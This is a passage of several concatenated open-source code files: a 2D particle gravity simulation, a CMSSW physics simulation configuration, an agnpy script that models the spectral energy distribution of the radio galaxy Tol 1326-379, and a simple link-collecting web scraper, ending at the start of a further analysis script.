apply(self,particle):\n\t\tif self.particle.ID == particle.ID:return\n\t\tdistance = PH_ForceField.distance(self.particle.position,particle.position)\n\t\tppdistance = self.particle.position-particle.position\n\t\tforce = PH_ForceField.forceOnSphere(self.particle.position,self.particle.mass,particle.position,particle.mass,distance)\n\t\tscale = force/distance\n\t\tif not self.particle.fixed:\n\t\t\tself.particle.forces -=PH_FP([scale*force*ppdistance[0],scale*force*ppdistance[1]])\n\t\tif not particle.fixed:\n\t\t\tparticle.forces += PH_FP([scale*force*ppdistance[0],scale*force*ppdistance[1]])\n\n\t@staticmethod\n\tdef forceOnSphere(p1,m1,p2,m2,distance):\n\t\treturn float(\"6.67e-11\")*10*((m1*m2)/(distance**2))\n\n\t@staticmethod\n\tdef distance(p1,p2):\n\t\treturn PH_ForceField.hyp(p1-p2)\n\n\t@staticmethod\n\tdef hyp(p):\n\t\treturn math.sqrt((p[0]**2)+(p[1]**2))\n\nclass PH_Particle():\n\tdef __init__(self,size = 1,position = (0,0),fixed = False,mass = 1,mergable = True,color = (255,255,255),acceleration = (0,0)):\n\t\tself.size = size\n\t\tself.position = PH_FP([float(position[0]),float(position[1])])\n\t\tself.fixed = fixed\n\t\tself.mass = mass\n\t\tself.forces = PH_FP([float(0),float(0)])\n\t\tself.intforces = PH_FP([float(0),float(0)])\n\t\tself.mergable = mergable\n\t\tself.color = color\n\t\tself.ID = random.uniform(1, 10)\n\t\tself.acceleration = PH_FP([float(acceleration[0]),float(acceleration[1])])\n\tdef step(self,multiplicator = 0.1):\n\t\tself.acceleration = self.acceleration + (self.forces-self.intforces)\n\t\tif not self.fixed:\n\t\t\tself.position = self.position + self.acceleration*multiplicator\n\t\tself.intforces = self.forces\n\t\tself.forces = PH_FP([float(0),float(0)])\n\nclass 
PH_environment():\n\tdef __init__(self):\n\t\tself.particles = []\n\t\tself.forceFields = []\n\n\tdef addField(self,field):\n\t\tself.forceFields.append(field)\n\n\tdef addParticle(self,particle):\n\t\tself.particles.append(particle)\n\t\tinitField = PH_ForceField(particle = particle)\n\t\tself.addField(initField)\n\n\tdef simulate(self):\n\t\tpMerge = []\n\t\tpForce = []\n\t\tfor (x,y) in PH_environment.powset(self.forceFields,self.particles):\n\t\t\tif (x.particle.ID,y.ID) in pForce or (y.ID,x.particle.ID) in pForce: \n\t\t\t\tcontinue\n\t\t\tif x.particle.ID == y.ID:continue\n\t\t\tx.apply(y)\t\n\t\t\tpForce.append((x.particle.ID,y.ID))\t#Save that we already applied the force\n\t\t\tif x.particle.mergable and y.mergable:\n\t\t\t\tif PH_ForceField.distance(y.position,x.particle.position) <= 0.9:\n\t\t\t\t\tpMerge.append((x.particle,y))\n\t\t\n\t\tpDel = []\n\t\tfor (x,y) in pMerge:\n\t\t\tpDel.append(x)\n\t\t\ty.color = ((x.color[0] + y.color[0])/2,(x.color[1] + y.color[1])/2,(x.color[2] + y.color[2])/2)\n\t\t\ty.acceleration = (y.acceleration*y.mass + x.acceleration*x.mass)/(x.mass+y.mass)\n\t\t\ty.forces = ((y.forces*y.mass) + (x.forces*x.mass))/(x.mass+y.mass)\n\t\t\ty.mass += x.mass\n\t\t\ty.size +=x.size\n\t\t\ty.fixed = True if y.fixed or x.fixed else False\n\t\tself.forceFields = [field for field in self.forceFields if not field.particle in pDel]\n\t\tself.particles = [item for item in self.particles if item not in pDel]\n\t\tfor i in self.particles:\n\t\t\ti.step()\n\t@staticmethod\n\tdef powset(a,b):\n\t\tr = []\n\t\tfor i in a:\n\t\t\tfor j in b:\n\t\t\t\tr.append((i,j))\n\t\treturn r\n\tdef dotList(self):\n\t\trPoints = []\n\t\tfor i in self.particles:\n\t\t\trPoints.append((i.position,i.size,i.color))\n\t\treturn rPoints\n\nclass PH_FP(tuple):\n\tdef __add__(self, other):\n\t\tif len(self) != len(other):\n\t\t\traise ValueError(\"tuple lengths don't match\")\n\t\treturn PH_FP(x + y for (x, y) in zip(self, other))\n\n\tdef int_coords(self):\n\t\t# __int__ must return a single int, so this tuple-valued helper gets a plain name\n\t\treturn tuple(int(x) for x in self)\n\n\tdef __mul__(self,other):\n\t\treturn PH_FP(x*other for x in self)\n\n\tdef __sub__(self,other):\n\t\treturn PH_FP(x - y for (x,y) in zip(self,other))\n\n\tdef __truediv__(self,other):\n\t\t# Python 3 dispatches '/' to __truediv__; the legacy __div__ is never called\n\t\treturn PH_FP([float(x/float(other)) for x in self])","repo_name":"Tortuginator/PixelWall","sub_path":"PixelWall/PresetAnimations/ForcesOfPhysics.py","file_name":"ForcesOfPhysics.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"40235022630","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"PROD\")\nprocess.load(\"SimG4CMS.Calo.PythiaMinBias_cfi\")\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\nprocess.load(\"IOMC.EventVertexGenerators.VtxSmearedGauss_cfi\")\nprocess.load(\"Geometry.CMSCommonData.ecalhcalGeometryXML_cfi\")\nprocess.load(\"Geometry.EcalCommonData.ecalSimulationParameters_cff\")\nprocess.load(\"Geometry.HcalCommonData.hcalDDConstants_cff\")\nprocess.load(\"Geometry.MuonNumbering.muonGeometryConstants_cff\")\nprocess.load(\"Geometry.MuonNumbering.muonOffsetESProducer_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.EventContent.EventContent_cff\")\nprocess.load('Configuration.StandardSequences.Generator_cff')\nprocess.load('Configuration.StandardSequences.SimIdeal_cff')\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.autoCond import 
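autoCond\n# Note (assumption, based on the usage below): autoCond maps symbolic keys\n# such as 'run1_mc' to concrete GlobalTag strings, so the config stays valid\n# as conditions tags are updated.\nfrom Configuration.AlCa.autoCond import 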
autoCond\nprocess.GlobalTag.globaltag = autoCond['run1_mc']\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n cerr = cms.untracked.PSet(\n enable = cms.untracked.bool(False)\n ),\n cout = cms.untracked.PSet(\n CaloSim = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n DEBUG = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n EcalGeom = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n EcalSim = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n HCalGeom = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n HFShower = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n HcalSim = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n INFO = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n enable = cms.untracked.bool(True),\n threshold = cms.untracked.string('DEBUG')\n ),\n debugModules = cms.untracked.vstring('*')\n)\n\nprocess.load(\"IOMC.RandomEngine.IOMC_cff\")\nprocess.RandomNumberGeneratorService.generator.initialSeed = 456789\nprocess.RandomNumberGeneratorService.g4SimHits.initialSeed = 9876\nprocess.RandomNumberGeneratorService.VtxSmeared.initialSeed = 123456789\nprocess.rndmStore = cms.EDProducer(\"RandomEngineStateProducer\")\n\nprocess.Timing = cms.Service(\"Timing\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(10)\n)\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.output = cms.OutputModule(\"PoolOutputModule\",\n process.FEVTSIMEventContent,\n fileName = cms.untracked.string('simevent.root')\n)\n\nprocess.generation_step = cms.Path(process.pgen)\nprocess.simulation_step = cms.Path(process.psim)\nprocess.out_step = cms.EndPath(process.output)\n\nprocess.g4SimHits.Physics.type = 'SimG4Core/Physics/DummyPhysics'\nprocess.g4SimHits.Physics.DummyEMPhysics = True\nprocess.g4SimHits.Watchers = cms.VPSet(cms.PSet(\n CheckForHighEtPhotons = cms.untracked.bool(False),\n TrackMin = cms.untracked.int32(0),\n TrackMax = cms.untracked.int32(0),\n TrackStep = cms.untracked.int32(1),\n EventMin = cms.untracked.int32(0),\n EventMax = cms.untracked.int32(0),\n EventStep = cms.untracked.int32(1),\n PDGids = cms.untracked.vint32(),\n VerboseLevel = cms.untracked.int32(0),\n G4Verbose = cms.untracked.bool(True),\n DEBUG = cms.untracked.bool(False),\n type = cms.string('TrackingVerboseAction')\n))\n\n# Schedule definition \nprocess.schedule = cms.Schedule(process.generation_step,\n process.simulation_step,\n process.out_step\n )\n\n# filter all path with the production filter sequence \nfor path in process.paths:\n getattr(process,path)._seq = process.generator * getattr(process,path)._seq\n","repo_name":"cms-sw/cmssw","sub_path":"SimG4CMS/Calo/test/python/run_cfg.py","file_name":"run_cfg.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"29309703258","text":"import numpy as np \nimport matplotlib.pyplot as plt \nfrom astropy import units as u\nfrom astropy import constants as const\nimport pandas as pd\nfrom astropy.constants import c\nfrom agnpy.spectra import ElectronDistribution\nfrom astropy.cosmology import FlatLambdaCDM\nfrom agnpy.emission_regions import Blob\nfrom agnpy.synchrotron import Synchrotron\nfrom agnpy.compton import SynchrotronSelfCompton\nfrom agnpy.utils.plot import plot_sed\nimport matplotlib.pyplot as plt\nfrom agnpy.utils.plot import load_mpl_rc\nfrom agnpy.spectra import BrokenPowerLaw\nfrom astropy.coordinates import Distance\nfrom astropy.table 
import Table\nfrom agnpy.emission_regions import Blob\n\n\n\n###Information###\n#We model the SED in two different scenarios, namely\n#assuming (1) that the jet is closely aligned toward the observer (as\n#for the case of blazars) and has a large Lorentz factor (blazar case)\n#or (2) that the jet is misaligned and slow (radiogalaxy case).\n\n# Global variables for Tol 1326-379\nN = 300 \nz = 0.0284 \nvelocity = 8595*10**(3) * u.m/(u.s) #8595 kms^-1 #velocity of the host galaxy \nviewing_angle_1 = 5.0*np.pi/180 #rad np.cos(x) where x is in radians\nviewing_angle_2 = 30.0*np.pi/180\nB_1 = 0.1*u.G\nB_2 = 0.2*u.G \ngamma_min_1 = 400.0 \ngamma_min_2 = 100.0 \ngamma_break_1 = 5.0*10**3 \ngamma_break_2 = 1.0*10**4 \ngamma_max_1 = 3.0*10**4 \ngamma_max_2 = 3*10**4 \nGamma_1 = 10.0\nGamma_2 = 2.0\nR_1 = 3.5*10**(15)*u.cm\nR_2 = 5.0*10**(16)*u.cm\nP_e_1 = 1.2*10**(44)*u.erg*1/(u.s)\nP_e_2 = 3.5*10**(43)*u.erg*1/(u.s)\nP_j_1 = 2.7*10**(44)*u.erg*1/(u.s)\nP_j_2 = 1.6*10**(44)*u.erg*1/(u.s)\np1 = 2.0 \np2 = 4.8 \n\n\n#Luminosity distance \ncosmo = FlatLambdaCDM(H0 = 70, Om0 = 0.3, Tcmb0 = 2.725)\ndistanceL = cosmo.luminosity_distance(z) #unit: Mpc\ndis = Distance(z=z).to(\"cm\")\n\n\n# Reading in the data with pandas\ndf_1 = pd.read_csv('values.csv')\n\n# Data with relativistic boosting (as they were presented in Tavacchio)\nx_v = df_1[\"energy\"].copy()\ny_v = df_1[\"flux\"].copy()\nerror_bars = df_1[\"flux_error\"].copy()\n\n# Doppler factor\ndef relativistic_doppler_factor(Gamma,viewing_angle): \n    beta = np.sqrt(1 - 1/(Gamma**2))\n    doppler_factor = 1/(Gamma*(1-beta* np.cos(viewing_angle)))\n    return doppler_factor\n\n\n# doppler values for _1 blazar case, _2 radiogalaxy case\ndoppler_1 = relativistic_doppler_factor(Gamma_1,viewing_angle_1)\ndoppler_2 = relativistic_doppler_factor(Gamma_2,viewing_angle_2)\n\nprint(\"doppler1:\", doppler_1)\nprint(\"doppler2: \", doppler_2)\n\n# make the x and y values into numpy arrays\nx_v_boosted = np.array(x_v) #*u.Hz\ny_v_boosted = np.array(y_v) # * (u.erg/( u.s * u.cm *u.cm ))\nerrorbars_boosted = np.array(error_bars) #* (u.erg/( u.s * u.cm *u.cm ))\n\n\n# x-axis\nfrequancy = np.logspace(9, 25, N) * u.Hz\n\n\n##Find the normalization \n\n\nU1 = 9/4 * P_e_1/(2*np.pi * Gamma_1**2 *R_1**2 * const.c.cgs) #* 4/3\nU2 = 9/4 * P_e_2/(2*np.pi * Gamma_2**2 *R_2**2 * const.c.cgs) #* 4/3\nEL = ElectronDistribution()\nBPL = BrokenPowerLaw()\n#SSC = SynchrotronSelfCompton()\n#SYN = Synchrotron()\n\nk_e1_result = BPL.from_normalised_energy_density(U1,gamma_min = gamma_min_1, gamma_max= gamma_max_1,p1= 2, p2=4.8, gamma_b= gamma_break_1)\nk_e2_result = BPL.from_normalised_energy_density(U2, gamma_min = gamma_min_2, gamma_max= gamma_max_2,p1= 2, p2=4.8, gamma_b= gamma_break_2)\n\nk_e1 = k_e1_result.k_e\nk_e2 = k_e2_result.k_e\nprint(\"ke1: \", k_e1)\nprint(\"ke2: \", k_e2)\n\n# these values were used for the test case below: \n#k_e1 = 9*10**(-3) * u.Unit(\"cm-3\") \n#k_e2 = 9.18*10**(-5) * u.Unit(\"cm-3\") \n\n\n## Synchrotron and SynchrotronSelfCompton \n# 1: blazar case \n# 2: radiogalaxy case\n\n\n# Method 1. define the emission region with the Blob class\nparameters_1 = { \n    \"p1\": p1, \n    \"p2\": p2,\n    \"gamma_b\": gamma_break_1,\n    \"gamma_min\" : gamma_min_1, \n    \"gamma_max\": gamma_max_1,\n\n}\n\nparameters_2 = { \n    \"p1\": p1, \n    \"p2\": p2,\n    \"gamma_b\": gamma_break_2,\n    \"gamma_min\" : gamma_min_2, \n    \"gamma_max\": gamma_max_2,\n\n}\n\n\nspectrum_dict_1 = {\"type\": \"BrokenPowerLaw\", \"parameters\": parameters_1}\nspectrum_dict_2 = {\"type\": \"BrokenPowerLaw\", \"parameters\": parameters_2}\n\n\nblob_1 = Blob(R_1,z,doppler_1, Gamma_1, B_1, k_e1, spectrum_dict_1, spectrum_norm_type=\"differential\" )\nblob_2 = Blob(R_2,z,doppler_2, Gamma_2, B_2, k_e2, spectrum_dict_2, spectrum_norm_type=\"differential\" )\n#print(\"blob1: \", blob_1)\n#print(\"blob2: \", blob_2)\n\n# have to use spectrum_norm_type = \"differential\", because we are using k_e to normalize the electron spectra (we could also have used n_e_tot or W_e)\n#print(blob)\n\n\n# The power of the jet\n#print(f\"jet power in particles blob 1: {blob_1.P_jet_e:.2e}\")\n#print(f\"jet power in particles blob 2: {blob_2.P_jet_e:.2e}\")\n#print(f\" jet power in B_1: {blob_1.P_jet_B:.2e}\")\n#print(f\" jet power in B_2: {blob_2.P_jet_B:.2e}\")\n\n\n# define the radiative processes\nsynch_1 = Synchrotron(blob_1,ssa= True)\nssc_1 = SynchrotronSelfCompton(blob_1,ssa = True)\n\nsynch_2 = Synchrotron(blob_2,ssa= True)\nssc_2 = SynchrotronSelfCompton(blob_2,ssa = True)\n\n\n\nsynch_sed_1 = synch_1.sed_flux(frequancy)\nsynch_sed_2 = synch_2.sed_flux(frequancy)\nssc_sed_1 = ssc_1.sed_flux(frequancy)\nssc_sed_2 = ssc_2.sed_flux(frequancy)\n\n\n\n# Method 2. use the other sed_flux function, which is the .evaluate_sed_flux \ndef calc(x,z_value, Luminocity_distance, doppler_value, magnetic_field, Radius,k_ee,power_1,power_2, G_break, G_min, G_max):\n    synch = Synchrotron.evaluate_sed_flux(\n        x,\n        z_value,\n        Luminocity_distance,\n        doppler_value,\n        magnetic_field,\n        Radius,\n        BrokenPowerLaw,\n        k_ee,\n        power_1,\n        power_2,\n        G_break,\n        G_min,\n        G_max,\n        ssa = True\n    )\n\n    ssc = SynchrotronSelfCompton.evaluate_sed_flux(\n        x,\n        z_value,\n        Luminocity_distance,\n        doppler_value,\n        magnetic_field,\n        Radius,\n        BrokenPowerLaw,\n        k_ee,\n        power_1,\n        power_2,\n        G_break,\n        G_min,\n        G_max,\n        ssa = True\n    )\n\n    return synch + ssc\n\n\n# PLOTS\n\n# The # corresponds to the numbering of the figures. 
\n# 1: Blazar case \n# 2: radiogalaxy case\n\n# matplotlib adjustments\nload_mpl_rc()\n\n# Plotting the data points \nplt.scatter(x_v_boosted,y_v_boosted,label = \"data\", color = \"royalblue\")\nplt.errorbar(x_v_boosted, y_v_boosted, yerr = error_bars, xerr = 0, color = \"royalblue\", fmt= \"none\")\n\n#1: Blazar Case \n#plot_sed(frequancy, synch_sed_1, label = \"Synchrotron\")\n#plot_sed(frequancy, ssc_sed_1, label = \"SSC\")\n#plot_sed(frequancy, synch_sed_1+ssc_sed_1, label = \"Sum\")\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_1, B_1, R_1, k_e1,p1,p2,gamma_break_1, gamma_min_1, gamma_max_1 ), label=\"syn + ssc\", color = \"red\")\n#plt.ylim(10**-16,10**-7)\n#plt.savefig(\"Tol1326379_blazar_case.png\")\n\n\n#print(blob_2.Gamma)\n\n# 2: radiogalaxy case \nplot_sed(frequancy,synch_sed_2, label = \"Synchrotron\")\nplot_sed(frequancy,ssc_sed_2, label = \"SSC\")\nplot_sed(frequancy,synch_sed_2+ssc_sed_2, label = \"Sum\")\nplot_sed(frequancy, calc(frequancy,z, dis, doppler_2, B_2, R_2, k_e2,p1,p2,gamma_break_2, gamma_min_2, gamma_max_2 ), label=\"syn + ssc\", color = \"red\")\nplt.ylim(10**-16,10**-10)\nplt.savefig(\"Tol1326379_radiogalaxy_case.png\")\n\n\n\n# Plotting with other values for the normalization\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_1, B_1, R_1, k_e1,p1,p2,gamma_break_1, gamma_min_1, gamma_max_1 ), label=\"blazar\", color = \"darkorange\")\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_2, B_2, R_2, k_e2,p1,p2,gamma_break_2, gamma_min_2, gamma_max_2 ), label=\"radio galaxy\", color = \"black\")\n#plt.ylim(3 * 10**-16,5 *10**-11)\n#plt.savefig(\"Testplot.png\")\n#plt.show()","repo_name":"theresp1/Multimessenger-modelling-of-FR0-radio-galaxies","sub_path":"Tol_1326-379.py","file_name":"Tol_1326-379.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24128510324","text":"import requests, settings, datetime\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass Webpage(object):\r\n def __init__(self, url):\r\n self.site = url\r\n self.request = \"\"\r\n self.status_code = 0\r\n self.s = settings.Settings()\r\n self.links = {\r\n \"internal\": [],\r\n \"external\": [],\r\n \"mail\": []\r\n }\r\n self.scheme = [\"http\", \"https\"]\r\n self.domains = [\".com\",\".co\",\".app\",\".online\",\".space\",\".store\",\".tech\",\".net\",\".org\",\".club\",\".design\",\".shop\",\r\n \".site\",\".io\",\".me\",\".us\",\".ca\",\".ac\",\".academy\",\".accountant\",\".accountants\",\".actor\",\".adult\",\".ae.org\",\".ae\",\r\n \".af\",\".africa\",\".ag\",\".agency\",\".ai\",\".am\",\".apartments\",\".com.ar\",\".archi\",\".art\",\".as\",\".asia\",\".associates\",\r\n \".at\",\".attorney\",\".com.au\",\".id.au\",\".net.au\",\".org.au\",\".auction\",\".band\",\".bar\",\".bargains\",\".bayern\",\".be\",\r\n \".beer\",\".berlin\",\".best\",\".bet\",\".bid\",\".bike\",\".bingo\",\".bio\",\".biz\",\".black\",\".blog\",\".blue\",\".boats\",\r\n \".boston\",\".boutique\",\".br.com\",\".brussels\",\".build\",\".builders\",\".business\",\".buzz\",\".bz\",\".cab\",\".cafe\",\".cam\",\r\n \".camera\",\".camp\",\".capetown\",\".capital\",\".cards\",\".care\",\".career\",\".careers\",\".casa\",\".cash\",\".casino\",\r\n \".catering\",\".cc\",\".center\",\".ch\",\".charity\",\".chat\",\".cheap\",\".church\",\".city\",\".cl\",\".claims\",\".cleaning\",\r\n \".click\",\".clinic\",\".clothing\",\".cloud\",\".cm\",\".cn.com\",\".co.uk\",\".coach\",\".codes\",\".coffee\",\".college\",\r\n 
\".cologne\",\".community\",\".company\",\".computer\",\".condos\",\".construction\",\".consulting\",\".contractors\",\".cooking\",\r\n \".cool\",\".country\",\".coupons\",\".courses\",\".credit\",\".cricket\",\".cruises\",\".cx\",\".cz\",\".dance\",\".date\",\".dating\",\r\n \".de\",\".deals\",\".degree\",\".delivery\",\".democrat\",\".dental\",\".dentist\",\".dev\",\".diamonds\",\".digital\",\".direct\",\r\n \".directory\",\".discount\",\".dk\",\".doctor\",\".dog\",\".domains\",\".download\",\".durban\",\".earth\",\".ec\",\".eco\",\r\n \".education\",\".email\",\".energy\",\".engineer\",\".engineering\",\".enterprises\",\".equipment\",\".es\",\".estate\",\".eu\",\r\n \".eu.com\",\".events\",\".exchange\",\".expert\",\".exposed\",\".express\",\".fail\",\".faith\",\".family\",\".fan\",\".fans\",\".farm\",\r\n \".fashion\",\".fi\",\".finance\",\".financial\",\".fish\",\".fishing\",\".fit\",\".fitness\",\".flights\",\".florist\",\".fm\",\r\n \".football\",\".forsale\",\".foundation\",\".fr\",\".fun\",\".fund\",\".furniture\",\".futbol\",\".fyi\",\".gallery\",\".games\",\r\n \".garden\",\".gd\",\".gg\",\".gift\",\".gifts\",\".gives\",\".gl\",\".glass\",\".global\",\".gold\",\".golf\",\".gr\",\".graphics\",\r\n \".gratis\",\".green\",\".gripe\",\".group\",\".gs\",\".guide\",\".guru\",\".gy\",\".hamburg\",\".haus\",\".health\",\".healthcare\",\r\n \".help\",\".hn\",\".hockey\",\".holdings\",\".holiday\",\".homes\",\".horse\",\".hospital\",\".host\",\".house\",\".how\",\".ht\",\".id\",\r\n \".im\",\".immo\",\".immobilien\",\".in\",\".industries\",\".info\",\".ink\",\".institute\",\".insure\",\".international\",\r\n \".investments\",\".is\",\".it\",\".je\",\".jetzt\",\".jewelry\",\".joburg\",\".jp\",\".jpn.com\",\".kaufen\",\".kim\",\".kitchen\",\r\n \".kiwi\",\".koeln\",\".kyoto\",\".la\",\".land\",\".lat\",\".lawyer\",\".lc\",\".lease\",\".legal\",\".lgbt\",\".li\",\".life\",\r\n \".lighting\",\".limited\",\".limo\",\".link\",\".live\",\".loan\",\".loans\",\".lol\",\".london\",\".love\",\".lt\",\".ltd\",\".lu\",\r\n \".luxe\",\".lv\",\".maison\",\".management\",\".market\",\".marketing\",\".mba\",\".media\",\".melbourne\",\".memorial\",\".men\",\r\n \".menu\",\".miami\",\".mn\",\".mobi\",\".moda\",\".moe\",\".mom\",\".money\",\".mortgage\",\".ms\",\".mu\",\".mx\",\".nagoya\",\".name\",\r\n \".network\",\".news\",\".ngo\",\".ninja\",\".nl\",\".nu\",\".nyc\",\".ac.nz\",\".org.nz\",\".kiwi.nz\",\".net.nz\",\".school.nz\",\r\n \".gen.nz\",\".geek.nz\",\".nz\",\".co.nz\",\".maori.nz\",\".okinawa\",\".one\",\".onl\",\".organic\",\".osaka\",\".page\",\".paris\",\r\n \".partners\",\".parts\",\".party\",\".pe\",\".pet\",\".ph\",\".photo\",\".photography\",\".photos\",\".pics\",\".pictures\",\".pink\",\r\n \".pizza\",\".pl\",\".plumbing\",\".plus\",\".pm\",\".poker\",\".porn\",\".press\",\".pro\",\".productions\",\".promo\",\".properties\",\r\n \".pt\",\".pub\",\".pw\",\".qa\",\".qpon\",\".quebec\",\".racing\",\".re\",\".realestate\",\".recipes\",\".red\",\".rehab\",\".reise\",\r\n \".reisen\",\".rent\",\".rentals\",\".repair\",\".report\",\".republican\",\".rest\",\".restaurant\",\".review\",\".reviews\",\".rip\",\r\n \".rocks\",\".rodeo\",\".ru.com\",\".run\",\".ryukyu\",\".sa.com\",\".sale\",\".salon\",\".sarl\",\".com.sb\",\".sc\",\".school\",\r\n \".schule\",\".science\",\".scot\",\".se\",\".services\",\".sexy\",\".sg\",\".com.sg\",\".sh\",\".shiksha\",\".shoes\",\".shopping\",\r\n 
\".show\",\".singles\",\".ski\",\".soccer\",\".social\",\".software\",\".solar\",\".solutions\",\".soy\",\".stream\",\".studio\",\r\n \".study\",\".style\",\".supplies\",\".supply\",\".support\",\".surf\",\".surgery\",\".sx\",\".sydney\",\".systems\",\".taipei\",\r\n \".tattoo\",\".tax\",\".taxi\",\".tc\",\".team\",\".technology\",\".tel\",\".tennis\",\".tf\",\".theater\",\".tienda\",\".tips\",\".tires\",\r\n \".tk\",\".tl\",\".to\",\".today\",\".tokyo\",\".tools\",\".top\",\".tours\",\".town\",\".toys\",\".trade\",\".trading\",\".training\",\r\n \".tube\",\".tv\",\".tw\",\".org.uk\",\".me.uk\",\".uk\",\".uk.com\",\".university\",\".uno\",\".us.com\",\".vacations\",\".vc\",\".vegas\",\r\n \".ventures\",\".vet\",\".vg\",\".viajes\",\".video\",\".villas\",\".vin\",\".vip\",\".vision\",\".vlaanderen\",\".vodka\",\".vote\",\r\n \".voyage\",\".wales\",\".wang\",\".watch\",\".webcam\",\".website\",\".wedding\",\".wf\",\".wien\",\".wiki\",\".win\",\".wine\",\".work\",\r\n \".world\",\".ws\",\".wtf\",\".орг\",\".xyz\",\".yoga\",\".yokohama\",\".yt\",\".co.za\",\".za.com\"]\r\n self.pageStart()\r\n\r\n '''\r\n pageRequest()\r\n Description: Takes self.site and checks if it is a valid url. If it is not a valid url,\r\n it will attempt to make it valid before sending a requests.get(). If requests.get()\r\n is valid, it is stored in requests and returned. If requests.get() is not valid,\r\n request is set to -1 and returned.\r\n Arguments: None\r\n Return: Request\r\n '''\r\n def pageRequest(self):\r\n \r\n preFix = False\r\n postFix = False\r\n \r\n # Check if site includes scheme (http:// or https://)\r\n for substring in self.scheme:\r\n if substring in self.site:\r\n preFix = True\r\n break\r\n\r\n # Check if site includes domain (.com, .org, etc)\r\n for substring in self.domains:\r\n if substring in self.site:\r\n postFix = True\r\n break\r\n try:\r\n\r\n # If scheme is missing, try adding http\r\n if preFix == False:\r\n print(\"[Error] Invalid URL: %s\" % self.site)\r\n print(\" Missing Scheme: http:// or https://\")\r\n self.site = \"http://\" + self.site\r\n print(\" Adding Scheme: %s\" % self.site)\r\n\r\n # If domain is missing, show error and return\r\n if postFix == False:\r\n print(\"[Error] Invalid URL: %s - Missing Domain\" % self.site)\r\n return -1\r\n \r\n # If domain is valid, continue with request\r\n else:\r\n request = requests.get(self.site, params=dict(\r\n query=\"web scraping\",\r\n page=2\r\n ))\r\n self.status_code = request.status_code\r\n if self.status_code != 200:\r\n print(\"[Error] Site: %s\" % self.site)\r\n print(\" Status: %d\" % self.status_code)\r\n except Exception as e:\r\n print(\"[Error] URL: %s\\n %s\" % (self.site, e))\r\n return -1\r\n\r\n return request\r\n\r\n '''\r\n pageParse()\r\n Description:\r\n Arguments:\r\n Return: Data\r\n '''\r\n def pageParse(self, tag=None):\r\n soup = BeautifulSoup(self.request.text, \"html.parser\")\r\n data = [[],[]]\r\n \r\n divs = soup.find_all(\"div\")\r\n data[0] = []\r\n for i in divs:\r\n data[0].append(i)\r\n\r\n links = soup.find_all(\"a\", href=True)\r\n for i in links:\r\n d = i[\"href\"]\r\n if d == \"#\" or d == \"/\" or d == \"\":\r\n continue\r\n if d[0:1] == \"#\" or d[0:1] == \"/\":\r\n self.links[\"internal\"].append(d)\r\n elif d[0:6] == \"mailto\":\r\n self.links[\"mail\"].append(d[7:])\r\n else:\r\n self.links[\"external\"].append(d)\r\n return data\r\n\r\n '''\r\n pageWrite()\r\n Description:\r\n Arguments:\r\n Return:\r\n '''\r\n def pageWrite(self, configuration, data):\r\n fileName = 
configuration[\"csv\"]\r\n with open(fileName, \"a\") as f:\r\n\r\n f.write(\"URL: \" + self.site + \"\\n\")\r\n currentDT = datetime.datetime.now()\r\n f.write(\"Time: \" + str(currentDT.strftime(\"%Y-%m-%d %H:%M:%S\")) + \"\\n\")\r\n f.write(\"TOTAL LINKS (\" + str(sum(map(len, self.links.values()))) + \")\\n\")\r\n\r\n if len(self.links[\"internal\"]) > 0:\r\n f.write(\"INTERNAL LINKS (\" + str(len(self.links[\"internal\"])) + \")\\n\")\r\n for i in self.links[\"internal\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"internal\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if len(self.links[\"external\"]) > 0:\r\n f.write(\"EXTERNAL LINKS (\" + str(len(self.links[\"external\"])) + \")\\n\")\r\n for i in self.links[\"external\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"external\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if len(self.links[\"mail\"]) > 0:\r\n f.write(\"MAIL LINKS (\" + str(len(self.links[\"mail\"])) + \")\\n\")\r\n for i in self.links[\"mail\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"mail\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n f.write(\"\\n\")\r\n\r\n print(\"[+] Data written to\", fileName)\r\n\r\n '''\r\n pageStart()\r\n Description:\r\n Arguments:\r\n Return:\r\n '''\r\n def pageStart(self):\r\n self.request = self.pageRequest()\r\n if (self.request == -1):\r\n return 0\r\n\r\n print(\"[+] Accessing \" + self.site)\r\n data = self.pageParse()\r\n\r\n if self.s.config[\"save\"] == True:\r\n self.pageWrite(self.s.config, data[0])\r\n else:\r\n return 1","repo_name":"bensherriff/webScraper","sub_path":"scraper/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4921305","text":"import requests\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport glob\nimport stat\nimport math\n\n\n# построение графиков зависимости\n# корреляционной размерности от размерности 